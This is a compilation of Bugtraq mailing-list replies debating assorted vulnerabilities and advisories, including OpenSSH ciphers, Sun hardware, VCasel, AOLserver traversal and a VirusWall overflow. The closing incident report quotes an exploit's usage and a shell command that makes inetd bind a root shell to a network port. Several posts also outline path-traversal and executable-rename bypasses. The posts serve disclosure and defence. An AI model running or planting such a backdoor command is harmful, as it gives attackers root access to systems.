Re: MS09-048 includes fixes for TCP/IP implementation issues reported more than a year ago
Does anyone have a reference pointing to the original announcement on here for these vulnerabilities? I would like to research them regarding the potential continued vulnerability of XP, since MS did not provide a patch for XP products.
Re: Insufficient Authentication vulnerability in Asus notebook
Oh please, I work with corporations large and small. I even work as an adviser to entire countries on how to rebuild after we bomb them to oblivion. Even in the strictest of environments there are always laptops with out of the box configs to be found. _ From: Susan Bradley [mailto:sbrad...@pacbell.net] To: Bob Fiero [mailto:i...@mentalfloss.net] Cc: bugtraq@securityfocus.com Sent: Thu, 14 May 2009 15:35:33 -0400 Subject: Re: Insufficient Authentication vulnerability in Asus notebook Oh please. Corporations build images of machines that don't have this. If you have this issue in your corporation, go talk to your IT guys and tell them to build better deployment images. If you have this problem, your IT guys are not doing their job. Bob Fiero wrote: >> You get the idea. This is non issue. >> > > I disagree. You are involved in intense business negotiations. During lunch > you leave your notebook unattended assuming it is safe with a password > protected > userID. Your competitor goes in to the conference room and logs in with > Administrator and installs something like eBlaster to log everything > you do and email it to him. > > Far fetched, but not a non-issue. > > _ > From: Mike Vasquez [mailto:mike.vasq...@gmail.com] > To: Jeremy Brown [mailto:0xjbrow...@gmail.com] > Cc: MustLive [mailto:mustl...@websecurity.com.ua], bugtraq@securityfocus.com > [mailto:bugt...@securityfocus.com] > Sent: Thu, 14 May 2009 11:02:38 -0400 > Subject: Re: Insufficient Authentication vulnerability in Asus notebook > > Once someone has physical access all bets are off, there's a lot the > can do. > > 1) steal it > 2) boot off cd and reset/enable admin acct > 3) boot off cd and grab all hashes > 4) pour a perfectly good frappucino on the keyboard > 5) cover it with smiley face stickers > > > You get the idea. This is non issue. > >
Re: Insufficient Authentication vulnerability in Asus notebook
> You get the idea. This is non issue. I disagree. You are involved in intense business negotiations. During lunch you leave your notebook unattended assuming it is safe with a password protected userID. Your competitor goes in to the conference room and logs in with Administrator and installs something like eBlaster to log everything you do and email it to him. Far fetched, but not a non-issue. _ From: Mike Vasquez [mailto:mike.vasq...@gmail.com] To: Jeremy Brown [mailto:0xjbrow...@gmail.com] Cc: MustLive [mailto:mustl...@websecurity.com.ua], bugtraq@securityfocus.com [mailto:bugt...@securityfocus.com] Sent: Thu, 14 May 2009 11:02:38 -0400 Subject: Re: Insufficient Authentication vulnerability in Asus notebook Once someone has physical access all bets are off, there's a lot the can do. 1) steal it 2) boot off cd and reset/enable admin acct 3) boot off cd and grab all hashes 4) pour a perfectly good frappucino on the keyboard 5) cover it with smiley face stickers You get the idea. This is non issue.
Re: OpenSSH security advisory: cbc.adv
> Maybe this was always clear, but along with that reassurance I guess > you would recommend we all take your stated remedial action : >[place] the following directive in sshd_config and ssh_config: >"Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc" > at the very next maintenance opportunity, on the grounds that it can't > hurt, and can only help ? It can possibly hurt very much - if ctr mode is subject to a different vulnerablility. There has been much discussion of ctr mode having *possible* issues, although nothing I know of published directly about ssh. On the other hand, we have a national security agency who refuses full disclosure, raising a vulnerability and pointing to a switch to counter mode. Perhaps this is to prevent the low likelyhood but possible attack they have found, or perhaps it is to encourage a hasty switch to counter mode which is "more convenient for national security reasons". I don't honestly know - the only REAL info on the subject I've seen has come from djm. You decide who you trust. personally, I won't be making that change hastily anywhere - Nothing I have is directly threatened by this attack, so I can wait until someone figures out the jist of it and implents an appropriate countermeasure, and I see some legitimate peer review on the topic as opposed to FUD spreading. I frankly trust the OpenSSH developers a lot more than I trust ssh.com or a puppet state "no such agency" acting as worn out lapdog for the sorts of people that implement things like the patriot act. People who will not share information with the developers of the software should always be suspect. They have no reason not to without a hidden agenda. -Bob
Re: Sun M-class hardware denial of service
> Not really - what I am not doing is trying to beat up a firmware > problem that whilst being quite bad can be mitigated by using native > features of Solaris. Too bad if OpenBSD cannot do the same - I am not > really sure about the benefits of OpenBSD on that scale of hardware > anyway considering the lack of kernel threading and the parlous state > of userland threading. I don't think you get it. OpenBSD doesn't care a whit about this. They stumbled upon it as the result of bringing up OpenBSD on such a machine. No - currently I wouldn't run OpenBSD on an M-class box either, other than for development purposes. but that's not really the point is it. Nobody except you is saying this problem has anything to do with running OpenBSD on a machine. The point is anyone with a black hat with sufficient clue enough to ignore this sort of ass-covering nonsense and write a kernel module, and go look at what the OpenBSD kernel *does* to wedge the zone, and make a solaris kernel module that does the same. At which point, at a minimum, the same wedging becomes possible from solaris, so yes, this is breaking separation. You're saying "well golly gee, but it's still separation if you don't let the attacker load kernel modules." good on you. have fun with your attacker, may you meet one of competence level greater than a script kiddie someday. I have, they're nice guys. and smart. smarter than me in a lot of things :) Personally if I'm buying gear to drink the whole virtualization kool-aid - the kool-aid has to work - meaning stuff done in the guest OS should never be able to do stuff like this. -Bob
Re: Sun M-class hardware denial of service
> > Yet you don't know what it is that causes the issue? What's Sun's > support arrangement for OpenBSD on SPARC? If it is reproduced in > Solaris, then I'm sure Sun would address it, but where is the benefit > for them to do so at present? It's not about OpenBSD on sparc - the OpenBSD people don't really care - the fact that it's possible at all means anyone with clue and a less than black hat can go take an OpenBSD kernel, figure out what it's doing there, and likely make a solaris kernel module to do the same thing - then they have a nice little tool. This indicates that something is broken, and can likely be taken advantage of. Frankly, the OpenBSD people aren't going to bother doing it. They're only interested in making OpenBSD go. I can think of several people I've met in bars on the other hand who might be interested in having a domain-instabrick module for solaris. -Bob
Re: Powerschool 404 Admin Exposure
Exposure of admin interface confirmed still extant in v5.1.2. However, no directories or filenames are shown in v5.1.2, and no administrative links can be navigated to without logging in using administrator credentials.
Re: On-going Internet Emergency and Domain Names
> Are we missing a possible solution? What does the larger > community suggest? RBLs such as SpamCop gave me an idea a few years back. We should build a virtual wall around the country. Each and every ISP that has any interconnect with another country would need to be mandated to participate. A cyber-threat type of 24/7 monitoring center with a palatable mix of representatives of each ISP involved, government security, private security entities, etc. would use an established set of protocols to identify external threats. Companies like Symantec already have such centers. Once identified, and that threat is out of US jurisdiction, said IP address(es) are identified and distributed amongst the participating ISP routers and blocked. Shut 'em down, immediately. And just like getting yourself on an RBL, have a set of protocols in place to follow to get off the blocking list.
Re: Re: Bypass phishing protection in Firefox / Opera
Doesn't work with Opera 9.2b. Opera rewrote the url to : http://www.mozilla.com/firefox/its-a-trap.html
Re: Firekeeper - IDS for Firefox available
> > Isn't it the case with every software created to add some protection > to you computer? Firewalls, antiviruses, IDSes etc. are all adding > code to your operating system that may, in the future, be found > vulnerable to some attack. It is just the question whether protection > they provide compensates additional threat they may introduce. > Yes, protection can mean added code, but consider the kind of code and where it is running. Typically I run an IDS such as snort on a tap interface with no access to send anything out. in particular, it's not looking at endpoint traffic after it's decrypted. Why? IDS's are big complicated things that to lots of string a byte comparisons against data provided by an attacker, the kind of code that is easy for the author to make mistakes in that lead to compromisable situations. So if snort is compromised, all the attacker typically gets without more work is the ablility to sniff, not the ablility to look at encrypted traffic in the clear, and ideally not the ability to send traffic out. Other programs (i.e. ssh) deal with complexity like this by attempting to isolate the privileges that the code doing most of the string bashing is running as - i.e. a privsep model, so if you break a piece of it (at least in most of the code) you *Don't* see encrypted traffic or passwords If this critter is compromised, he likely gets the entire endpoint machine, or if not, he most likely for sure gets the ability to read decrypted https streams. - Fix the browser bugs rather than having another plugin to look for them. -Bob
Re: Firekeeper - IDS for Firefox available
* Jex <[EMAIL PROTECTED]> [2007-03-09 13:27]: ... > >rules similar to Snort ones to describe browser based attack > >attempts. > > All incoming HTTP and HTTPS traffic is scanned with these > >rules. HTTPS and compressed responses are scanned after > >decryption/decompression. So the next snort style overflow/format string/etc bug from all that string bashing code going on in the ids can now let the attacker compromise a process with access to my https stream decrypted - probably on an already convieniently open descriptor. Yeah. Baby. "Web Browers are Bloated Fscking Monsters that are full of bugs" "Lets add more code to look for people exploiting the bugs - of course this code won't have bugs.." Now maybe I'm a little bit radical, but something tells me we've learned nothing from the past here kids. -Bob Church of the Bloated Spaghetti Monster O O < B S M > - ( I'd Fly but I'm Bloated with too much Spaghetti) / | | | | | | | \ | | | | | | | | | $ sudo ldd firefox-bin firefox-bin: StartEnd Type Open Ref GrpRef Name exe 10 0 firefox-bin 07cb5000 27cc7000 rlib 01 0 /usr/local/mozilla-firefox/libmozjs.so.19.0 0d4fa000 2d4fd000 rlib 01 0 /usr/local/mozilla-firefox/libxpcom.so.19.0 063ca000 263df000 rlib 02 0 /usr/local/mozilla-firefox/libxpcom_core.so.19.0 0a9ec000 2a9f rlib 04 0 /usr/local/lib/libplds4.so.18.0 09f33000 29f37000 rlib 04 0 /usr/local/lib/libplc4.so.18.0 0e7fc000 2e806000 rlib 06 0 /usr/local/lib/libnspr4.so.18.0 0a0c2000 2a17a000 rlib 01 0 /usr/local/lib/libgtk-x11-2.0.so.802.1 0bc86000 2bcad000 rlib 02 0 /usr/local/lib/libgdk-x11-2.0.so.802.1 0dc27000 2dc2e000 rlib 03 0 /usr/local/lib/libgdk_pixbuf-2.0.so.802.1 0a0bb000 2a0bf000 rlib 03 0 /usr/local/lib/libpangocairo-1.0.so.1200.3 03652000 23657000 rlib 04 0 /usr/local/lib/libpangoft2-1.0.so.1200.3 0fbcb000 2fbe2000 rlib 05 0 /usr/local/lib/libpango-1.0.so.1200.3 01d67000 21d7 rlib 02 0 /usr/local/lib/libatk-1.0.so.1011.3 0b5dd000 2b5ea000 rlib 08 0 /usr/local/lib/libgobject-2.0.so.1000.3 0e5a5000 2e5a9000 rlib 08 0 /usr/local/lib/libgmodule-2.0.so.1000.3 0278f000 227c9000 rlib 010 0 /usr/local/lib/libglib-2.0.so.1000.3 06a54000 26a58000 rlib 011 0 /usr/local/lib/libintl.so.3.0 02437000 22513000 rlib 011 0 /usr/local/lib/libiconv.so.4.0 0bc14000 2bc2 rlib 04 0 /usr/local/lib/libcairo.so.5.0 0ac74000 2ac9 rlib 07 0 /usr/X11R6/lib/libfreetype.so.13.1 05fcf000 25fdf000 rlib 06 0 /usr/X11R6/lib/libfontconfig.so.3.0 0d0c2000 2d0c7000 rlib 05 0 /usr/local/lib/libglitz.so.2.0 0a5d1000 2a5d8000 rlib 05 0 /usr/local/lib/libpng.so.5.1 06fe5000 26fed000 rlib 05 0 /usr/lib/libz.so.4.1 00035000 20039000 rlib 07 0 /usr/X11R6/lib/libXrender.so.4.1 09d92000 29dde000 rlib 012 0 /usr/X11R6/lib/libX11.so.9.0 07e6b000 27e6f000 rlib 011 0 /usr/X11R6/lib/libXext.so.9.0 03b3e000 23b45000 rlib 012 0 /usr/lib/libm.so.2.3 0ecae000 2ecd4000 rlib 01 0 /usr/lib/libstdc++.so.42.0 0704c000 2708 rlib 05 0 /usr/lib/libc.so.40.3 0e93c000 2e945000 rlib 01 0 /usr/lib/libpthread.so.7.0 02384000 22388000 rlib 04 0 /usr/X11R6/lib/libSM.so.8.0 0f8dc000 2f8e3000 rlib 05 0 /usr/X11R6/lib/libICE.so.8.1 0dd4d000 2dd5 rlib 02 0 /usr/X11R6/lib/libXrandr.so.5.0 05396000 2539a000 rlib 02 0 /usr/X11R6/lib/libXi.so.9.0 0eb0e000 2eb12000 rlib 02 0 /usr/X11R6/lib/libXinerama.so.4.0 0dac4000 2dac8000 rlib 02 0 /usr/X11R6/lib/libXcursor.so.3.0 0a9a9000 2a9ac000 rlib 03 0 /usr/X11R6/lib/libXfixes.so.4.0 02114000 2211d000 rlib 01 0 /usr/X11R6/lib/libexpat.so.5.0 0afd9000 0afd9000 rtld 01 0 /usr/libexec/ld.so
Re: *BSD banner INT overflow vulnerability
> that vuln is about as useless as the dhcpd vuln I found. I guess it's good > for practice, but why would you brag about finding that Since it was a vulnerability that bugtraq could post immediately since they didn't have to alert their corporate sugardaddies about it first ;) -Bob
Re: Snitz Forums 2000 v3.4.06
Vender has supplied a fix: http://forum.snitz.com/forum/topic.asp?TOPIC_ID=62773
Re: LAMP vs Microsoft
> > You're confusing what I'm interested in (platform security) with No, I'm not confusing it at all, I'm saying it's a non-issue. Any Von Neuman type of architecture is "secure" - it does exactly what you tell it to do. If you don't tell it to do insecure things. it does not. If it's not deterministic, then fine, you have an issue. > the people who use the platform to develop on top of. If the > foundations of what you're using are insecure, then the web > developer has a harder task. I disagree. I think most modern computing platforms start out as "secure" within their limitations if you understand them. It's code written for them that is the problem, plain and simple. The more complexity you add what you implement on top of a platform, the more bugs you add in the implementation, and the more opportunity for people not to understand the side effects. But I expect to see a great market for people reinventing the wheel for people who don't understand that life is pain, and anyone who says otherwise is selling something. Oh, and since you mention it, I doubt anyone the OpenBSD mob would disagree with what I'm saying, or that I would care if they did. Unlike the corporate world there are still some free projects that allow for participants to speak their mind freely and not toe the party line. Of course, I haven't yet asked what you're selling. Sounds to me like it's another effort to convince the unwitting that life isn't pain and blow SuNshine up their posteriors. -Bob
Re: LAMP vs Microsoft
> > The simple fact is most of the MS/PHP/JAVA web development will be > > being done by code monkeys, fresh out of school.. > > You're confusing what I'm interested in (platform security) with > the people who use the platform to develop on top of. If the > foundations of what you're using are insecure, then the web > developer has a harder task. > I don't think the platform matters all that much if people are writing code and deploying code without security as a goal. While a particular platform may make it more difficult for a certain type of attack to occur (i.e. it's harder to have traditional buffer overflow attacks in something like OpenBSD or Java) The avenue of attacks for web applicatons is broad enough, particularly when the browser and ease-of-use-assisted social engineering is involved that the platform is going to be moot compared to basic application design and deployment issues. Heck, lots of banks do clear text redirects from http://www.bigassedbank.com/ to https://www.bigassedbank.com/, and then have idiots using them from coffee shops. That's much more fundamental than the sorts of things like html goo, sql insertion, browser bugs, etc. etc. etc. I think the focus on "choice of platform" merely distracts attention from the design of the entire application and what the end to end impacts are. I know I've been given the "It's written in Java it's secure" line of horse apples from people selling an application that couldn't even do ssl connections to ldap and smtp, and insisted on doing them in the clear. See? the choice of platform in this case is moot - design and implementation without security in mind is the problem. -Bob
Re: LAMP vs Microsoft
> And I think vulnerabilities disclosed are a much better indicator > of the changes to QA/development of products than any hyperbole > from those responsible (be it management or developers.) No, I think vulnerabilities disclosed is simply a measure of how much development and deployment is happening on the platform. period. > I fully expect that both the Microsoft and Linux based platforms to > continue to be the most popular for web deployments and thus the most > interesting for hackers to target and vulnerabilities to be found. > > What would concern me more here is if one platform was on the up > whilst the other was on the down. This will always be the case as one platform changes in popularity for deployments relative to another. The simple fact is most of the MS/PHP/JAVA web development will be being done by code monkeys, fresh out of school.. I'm pretty certain they will "inbug" the same average number of bugs per line of code they write no matter what platform it is. Development is often outsourced to an external coding haus, written to a spec, without complete info about what the whole final application is going to do. Frequently they don't even reuse "mature" code from past releases because you don't want to release it to the external people, or you're too busy chasing platform-du-jour (Want a great example of this? I'm betting Sun One, going from version 5 to version 6 is a good one) -Bob
Re: LAMP vs Microsoft
> If the number of vulnerabilities is graphed over time, is either > heading down or both heading up or...? > > - I'm not asking for a "who's better", I just want to know if > anyone has a good set of numbers and if they're graphed for easy > comparison. > > > p.s. LAMP = Linux/Apache/MySQL/PHP > Yes, but what are you hoping to prove with those numbers. I think all you're demonstrating is what things get more attention, likely due to their popularity, so they make a more interesting target. I.E. just because you don't find hardly any vulnerabilities for web apps deployed using ANFC (ANFC == AIX, NetCat, Flat Files, and C (please sir can I have another..)[1]) doens't mean those that are aren't rife with them. It's like all the people running around running OSX thinking how secure it is because there aren't many published vulnerabilities. Don't get me wrong, I actually do believe security through obscurity works (OSX is living proof). but I don't think the numbers you are suggesting will mean much. Just from what I've "seen" I'd guess they were comparable. What does that mean? well, pretty much web applications under Windows or LAMP appear use the same development model for much of their code - first to market with coolest features the fastest. Quality is an afterthought to be dealt with in patches or future releases, which means security is a further afterthought. Do I like running either? No. The graph numbers end up just being nutritionless fodder for trolls and management. -Bob [1] Yes, I have seen an ANFC used for real [2] [2] Yes, it had a hole.
Re: Strengthen OpenSSH security?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Off topic, but anyway -- you could firewall those smart guys out, since they have to make more connections in less time then any sane legit user would. Something like http://www.bgnett.no/~peter/pf/en/bruteforce.html can be done with almost any firewall I think. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wkYEARECAAYFAkRIJFYACgkQAQ09syE0bn6RcgCfdYqTbC/oGsJxD52VqWLQf2znu+IA nRY0pFNfaU7Xx3WT6uENnMO2wFis =ybZQ -END PGP SIGNATURE- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485
Re: Quarantine your infected users spreading malware
> As many of us know, handling such users on tech support is not very > cost-effective to ISP's, as if a user makes a call the ISP already > losses money on that user. Than again, paying abuse desk personnel just > so that they can disconnect your users is losing money too. > > Which one would you prefer? > from home : # Training wheels for windows boxes. Stomp anything other than # web ftp and ssh. If they need more they should run something else. block in log on { $int_if, $wi_if } proto tcp from any os Windows to any pass in on { $int_if, $wi_if } proto tcp from any os Windows to any port { 80, 443, 22, 21 } keep state Tricks like max states and an overflow table help too. But worrying about 139 and 445 is just hole du jour. Worrying only about windows is OS du jour. The real problem is not Aunty Jane. It's twofold: 1) Aunty Jane is naiive and easily socially engineered 2) Aunty Jane is running crap that can either be directly compromised, or that makes it easier to do 1) above. Packet filtering customers by default will make no difference as more and more bad software comes out that simply embeds itself in web protocols and the like that you simply can't block arbitrarily and stay in business. Wait for the first good VOIP propagating worm (humming "woo hooo woo hoo hooo) -Bob
Re: Mozilla Thunderbird SMTP down-negotiation weakness
> > The "TLS, if available" option is common to most MUAs and is a serious > security problem. > As is every other mainstream application of TLS/SSL I've ever seen coded into a mainstream application. Don't just pick on Thunderbird for it - applications using TLS/SSL typically make MITM easy by design, rather than difficult. Sit you your faviorite wireless network and MITM your faviorite ssl web sites off it. If your user population is very intelligent, maybe only 9 out of 10 will click the "Windows is annoying me with a box and an OK button - I will click OK to keep going" popup and ignore the certificate mismatch utterly. Otherwise the only hard part will be finding a user that doesn't ignore the mismatch - it's so easy to get passwords this way it isn't even sporting. It's like whacking baby seals with a stick. SSL/TLS applications are just the latest most fertile ground where software designers have put in a crutches for lazy stupid people thereby rendering something kinda ok into something mostly useless. -Bob -- Bob Beck AICT [EMAIL PROTECTED] University of Alberta if ((not 0 && not 1)!=(!0 && !1)){print "I want what Larry and Tom smoke!\n";}
Re: ZH2003-3SA (security advisory): Storefront sql injection: users info disclosure
In-Reply-To: <[EMAIL PROTECTED]> This posting is completely false. Furthermore, the assertation in the report that the vendor was notified is also false. StoreFront 6.0 is a .NET application and contains no file named login.asp. The previous version, StoreFront 5.0 was found to be subject to the SQL Injection vulnerability in October of 2002. A patch was released on October 17th 2002 in build 50.4014. StoreFront Support ZH2003-3SA (security advisory): Storefront sql injection: users info >disclosure >Published: 12/07/2003 > >Released: 12/07/2003 > >Name: Storefront sql injection: users info disclosure > >Affected Systems: StoreFront 6.0 (and older versions?) > >Issue: Remote attackers can obtain users info > >Author: [EMAIL PROTECTED] > >Description > >*** > >Zone-h Security Team has discovered a serious security flaw in StoreFront >6.0 >(and older versions?). "Storefront offers merchants and developers a >feature >rich, fully customizable e-commerce solution at a fraction of the cost to >deploy >and maintain." > >Solution: > >* > >The vendor has been contacted and a patch is not yet produced > > >G00db0y - www.zone-h.org admin > >Original advisory here: http://www.zone-h.org/en/advisories/read/id=2684/ >
Re: ADVISORY SSRT0715 Compaq Management Software Potential SecurityVulnerability (fwd)
I've tested this on various Compaq boxes running Netware 5.0 and 5.1, with and without BorderManager, and found them not to be vulnerable to acting as an anonymous proxy. On each attempt the Compaq web agent abends without affecting other services. I guess if I wanted some excitement I'd have to do something silly, like run an IIS (Insecure Information Server) or Virus Exchange server on the public Internet.
Microsoft Security Bulletin MS01-019
From: Microsoft Product Security <[EMAIL PROTECTED]> Date: Wed, 28 Mar 2001 07:08:28 -0800 - -- Title: Passwords for Compressed Folders are Recoverable Date: 28 March 2001 Software: Plus! 98 and Windows Me Impact: Data compression passwords can be recovered. Bulletin: MS01-019 Microsoft encourages customers to review the Security Bulletin at: http://www.microsoft.com/technet/security/bulletin/MS01-019.asp. - -- . . . Mitigating Factors: - The password at issue here is not related in any way to the user's network logon password. It is used solely for password-protecting compressed folders. Considering how frequently most people tend to reuse passwords, this is a pretty strong statement. Since Microsoft states that the folder password is "not related in any way to the user's network logon password" with such confidence, that would seem to imply a mechanism that prohibits password reuse when establishing the folder compression password. Is that the case, or does this statement merely promote a false sense of security? -- Bob Rogers
Ben Greenbaum: Re: SSHD-1 Logging Vulnerability
>> [users getting out of sync and passwords getting logged] >Not always. I can think of one Windows SSH client off the top of my head >that will prompt for the username and password seperately - SecureCRT. I'm >sure there are others as well that I'm just not thinking of right now... Well, that and it's easy to just brainfart and type a password in when putty or some other silly client askes me who to log in as. Really all a moot point as long as the daemon logs using authpriv. Your system should be set up to log that stuff to a file only root can read. At that point only root can see when the user gets out of sync, and heck, if they want to they can trojan the daemon to see what they want anyway, assuming passwords are being used. If you arbitrarily syslog stuff like that to world readable files you're running a big risk. The daemon needs to do it's part by logging it to the authpriv facility so you can separate it, and after that you need to make sure you set up syslog right. -Bob cc: Subject: Ben Greenbaum: Re: SSHD-1 Logging Vulnerability >> [users getting out of sync and passwords getting logged] >Not always. I can think of one Windows SSH client off the top of my head >that will prompt for the username and password seperately - SecureCRT. I'm >sure there are others as well that I'm just not thinking of right now... Well, that and even I sometimes just brainfart and type my password in when putty or some other silly client askes me who to log in as. Really all a moot point as long as the daemon logs using authpriv and your system is set up log that stuff to a root-readable only file. At that point only root can see when the user gets out of sync, and heck, if they want to they can trojan the daemon to see what they want anyway. If you arbitrarily syslog stuff like that to world readable files you're running a big risk. The daemon needs to do it's part by logging it to the authpriv facility so you can separate it, and after that you need to make sure you set up syslog right. -Bob
Vulnerability in AOLserver
From: [EMAIL PROTECTED] Date: Tue, 6 Feb 2001 02:31:40 -0800 . . . AOLserver v3.2 is a web server available from http://www.aolserver.com. A vulnerability exists which allows a remote user user to break out of the web root using relative paths (ie: '...'). Details AOLServer checks the requested virtual path for any double dots ('..'), and returns a 'Not Found' error page if any are present. However, it does not check for triple dots ('...'). Here is an example URL: http://localhost:8000/.../[file outside web root] Note that this vulnerability has only been tested on the latest stable release (v3.2) for the Win32 platform. . . . AOLserver v3.2 on Linux (RH 6.0) does not appear to be vulnerable. OS-dependent code? -- Bob Rogers
Re: Securax Security Advisory: Windows98 contains a serious buffer overflow with long filenameextensions.
I found that 98Lite (*) is not vulnerable to this, but my Eudora app was rendered inaccessible when Zoa_Chien e-mailed me an example. I had to delete his message from my Eudora spool directory before I was able to load Eudora again. (*) 98Lite is a modified Win98. It is a full 98 system without IE, Outlook, and some other MS Internet "features". Contrary to MS lies, this configuration benefits consumers with increased system performance, security and robustness of the OS. More info can be found at http://www.98lite.net Chances are if you install 98 with this configuration, you will never let IE degrade your system again.
Re: MS signed softwrare privileges
At 04:35 PM 2/22/2000 +, you wrote: >I would like to clarify some aspects from the Elias post >regarding Microsoft signed software. With this in mind...I really wish that a favorite Win98 utility of mine, 98Lite, would get some more airtime. (http://www.98lite.net) This latest stab in the back of every Windows user by M$ only further drills home the reasons. I firmly believe that IE on a Windows machine, in itself is a bug. (And then some) With the use of 98Lite and three files from Win95, I have a full Win98 system without a trace of IE or Outlook. My system runs faster (measurable with WinBench), a high degree of an increase in stability, and is much much more secure. Despite what Microsoft says, Internet Explorer harms consumers. I really hope for our sake the DOJ gets the job done right this time.
BorderManager csatpxy.nlm fix avalable.
The file csatpxy1.exe available for download at http://support.novell.com. This doesn't seem to entirely fix the issue, it only limits memory used by csatpxy.nlm to 100k per session. I haven't tested, but would assume a barrage of telnet connections to port 2000 would eventually eat up the servers memory and bring it grinding to a halt. The only real fix is to block port 2000 on the public interface. Bob Fiero Network Specialist Cummings & Lockwood
NT Service Pack requirements (Bell Atlantic DSL)
I just learned that Bell Atlantic (major ISP on the US East coast) requires its Windows NT DSL customers to remove the latest service packs, rolling back the installed service packs two levels (back to SP4), thus re-installing all of the bugs and security holes corrected by the most recent SPs. Bob Kline mailto:[EMAIL PROTECTED]
Warning: VCasel security hole.
Blue Collar Hackers Union http://bcu.n3.net -Security Bulletin- 1/17/00 From: xDeath To: ALL In Reference to: VCasel 3.0 Platform: Win95 -B A C K G R O U N D I N F O- Vcasel (Visual Casel) is a program released by Computer Power Solutions of Illinois which is apparently intended as some sort of addon to Novell Netware 3.X and above. What VCasel is supposed to do, or is advertised to do is provide a nice GUI for network admins to secure and maintain a LAN with ease and provide each user with a customized(unalterable) desktop. The program boasts that with VCasel there is no longer a need for "access control, policy files or profiles." This program also says that it can prevent users from executing files not specified by the Admin. It also does more, but I am entirely to lazy to list the rest of its features. -P R O B L E M- Vcasel uses fails to successfully limit or prevent the execution of "un-approved files." -E X P L A I N A T I O N- The program does succeed in limiting the names of the files executed, but there is no path verification. For example, if an admin said user JohnDoe could execute write.exe, the admin isn't specifying c:\windows\write.exe, just the binary write.exe. Now JohnDoe decides that he is getting bored on the network so he goes off and finds his favorite game online(pong.exe and downloads it to his home directory on H: (total different drive and path then write.exe). He firsts tries to execute pong.exe from his available drives folder and sees an "Unauthorized Executable" message window pop up on his screen. Next John decides to re-download the game, but this time name it something different, he chooses to name it(when prompted by client) write.exe, but he saves it to his home directory. He once again tried to run it from his available drives folder and w00p! it started up. Now sure, one person running a game of some sort isn't that big of a deal, but think of the possibilities. What if he renamed another, far more malicious file write.exe? I have tested several executables with this hole and was able to load a login/password logger from a normal user account that would start on boot-up. Also, from a normal user I was able to view and change files/directories/drives that were specified as hidden and "unaccessible" thru VCasel by simply copying and renaming File Manager. The ramifications are practically endless. -F I X- No fix/patch is presently available from what I know. -- [EMAIL PROTECTED] http://bcu.n3.net __ Do You Yahoo!? Talk to your friends online with Yahoo! Messenger. http://im.yahoo.com
Re: Interscan VirusWall NT 3.23/3.3 buffer overflow.
Just to keep everyone updated, Trend has examined the exploit and is currently in the process of testing an official patch for this problem. This should be available within a few hours at most. Thank you, Bob Li Product Manager Trend Micro, Inc. E-Mail: [EMAIL PROTECTED] Phone: 408-863-6341 -Original Message- From: dark spyrit [mailto:[EMAIL PROTECTED]] Sent: Sunday, November 07, 1999 4:52 AM To: [EMAIL PROTECTED] Subject: Interscan VirusWall NT 3.23/3.3 buffer overflow. A buffer overflow exists on the VirusWall smtp gateway - by sending a long HELO command you can overflow the buffer and execute arbitrary code. Example code has been written which will spawn a command prompt on a port you specify. Before you shrug this one off, take a look: Connected to mail1.microsoft.com. Escape character is '^]'. 220 mail1.microsoft.com InterScan VirusWall NT ESMTP 3.23 (build 9/10/99) ready at Sun, 07 Nov 1999 03:38:44 -0800 (Pacific Standard Time) The ironic thing here is, VirusWall was designed to prevent viruses and 'malicious code'. Obviously not a lot of thought was taken before laying their trust into 3rd party 'security' products. A quick note to the millions out there who would give their right arm to compromise microsofts network - sorry, their firewall would prevent the payload from spawning a remote shell.. unless of course it was modified to stop an existing service to open a port :) Exploit source and binary is available at http://www.beavuh.org. Credit to Liraz Siri for bringing this to our attention. Hi to eEye/w00w00/teso. dark spyrit http://www.beavuh.org - bend over and pray.
ASUS mother board security question...
Question from a co-worker that I do not have an answer to... Does anyone reading BugTraq know the answer, and whether or not this is a major security exposure? Bob Statement of fact and question(s) below: Recently I built a new computer and I noticed that the ASUS mother board has a function (if you are using an ATX power supply) to remotely turn on the computer if anything is received on either the LAN or modem ports. It seems that anything that triggers an external interrupt line will turn on the computer. Security questions: 1) am I correct in assuming that anyone who sends a packet to you over the Internet will appear on the LAN port if you have a cable modem and if so will they have access to your computer? 2) what options do I have to secure the computer? (multiboot OS/2 and Linux) I am aware that a BIOS switch will disable these features but they could be useful if the machine is properly configured. == End of statement and questions... R.S. (Bob) Heuman - Toronto, ON, Canada === <[EMAIL PROTECTED]>or <[EMAIL PROTECTED]> Copyright retained. My opinions - no one elses... If this is illegal where you are, do not read it!
Compaq CIM UG Overwrites Legal Notice
We discovered today that during Compaq Insight Manager upgrades to v4.23b they overwrite the HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\LegalNoticeCaption and LegalNoticeText with a message to continue the installation after reboot. When the installation is completed after rebooting, these keys are cleared and your legal notice is gone. If your security policies are reliant on legal notices this is not a good thing. We will open an incident with Compaq in the morning but I felt this might be something folks should be aware of immediately since I have not seen it reported elswhere. Bob Free Sr Network Specialist Pacific Gas & Electric Co. Auburn, CA CTS/IO/DC/System Server Support Internal 732.5196 External 530.889.5196 mailto:[EMAIL PROTECTED]
Re: Vulnerability in Solaris 2.6. rpc.statd ?
I found two binary-only exploits on a hacked machine. The one of most interest was "amexp" which when executed without arguments presents the following: Usage: ./amexp address cache command type [port] Further help: address-system address cache -system hostname command-execute this command type -0: Solaris 2.5.1 stock, 1: Solaris 2.5.1 patched, 2.6 & 2.7 port -optional port to bypass portmapper A shell script that was included was "go.amexp" which contained: ./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' > /tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3 The command is nearly identical to what is used for both tooltalk and rpc.cmsd attacks The proper patches were installed and I do not believe that it is the statd/automountd exploit since no indirect rpc services execution was attempted. This incident is closed. - Original Message - From: Tabor J . Wells <[EMAIL PROTECTED]> To: Bob Todd <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Tuesday, August 24, 1999 1:52 PM Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ? > On Sat, Aug 21, 1999 at 12:31:18PM -0400, > Bob Todd <[EMAIL PROTECTED]> is thought to have said: > > > While performing an on-site incident response at > > ___, I found several > > Solaris-oriented exploit programs including a > > statd2.6 (others were calendar > > manager, tooltalk, and lockd?). Since there is an > > exploit program for statd on > > Solaris 2.6, I could conclude that Solaris 2.6 > > statd is vulnerable to attack. I > > have not tried the exploit, but since the 